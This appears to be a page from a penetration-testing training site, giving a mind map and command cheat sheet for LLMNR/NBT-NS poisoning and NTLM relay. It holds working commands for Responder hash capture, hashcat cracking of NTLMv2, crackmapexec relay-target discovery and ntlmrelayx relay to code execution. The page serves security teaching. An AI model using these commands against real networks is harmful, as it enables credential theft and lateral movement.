Dashboard > Mind Maps > LLMNR/NBT-NS Attack Flow

LLMNR/NBT-NS Attack Flow

Poisoning and relay attack methodology

LLMNR/NBT-NS Poisoning

Tip: Click on any node to see related information!

MAP Interactive Mind Map

graph TD A[Network Access] --> B[Start Responder] B --> C[Wait for Broadcast] C --> D[Capture NTLMv2] D --> E{Attack Path} E --> F[Crack Offline] E --> G[NTLM Relay] F --> H[hashcat -m 5600] H --> I[Plaintext Creds] G --> J[Check SMB Signing] J -->|Disabled| K[ntlmrelayx] K --> L[Code Execution] I --> M[Lateral Movement] L --> M

MODULES Related Modules

LLMNR/NBT-NS Poisoning

Capture hashes via Link-Local Multicast Name Resolution and NetBIOS Name Service...

Active Directory

REF Quick Reference

Responder

sudo responder -I eth0 -rdwv # Start Responder on eth0

Captured Hashes

# Location
/usr/share/responder/logs/ # Log directory
# Format: NTLMv2
user::DOMAIN:challenge:response:... # Hash format

Crack with Hashcat

hashcat -m 5600 hash.txt wordlist.txt # Crack NTLMv2 hashes

Relay Attack

# If SMB signing disabled
impacket-ntlmrelayx -tf targets.txt -smb2support # Relay NTLM auth to targets
# Targets without signing
crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt # Find relay targets

Back to Mind Maps View Full Module

Save Your Progress

LLMNR/NBT-NS Attack Flow

MAP Interactive Mind Map

INFO Node Details

MODULES Related Modules

LLMNR/NBT-NS Poisoning

REF Quick Reference

Responder

Captured Hashes

Crack with Hashcat

Relay Attack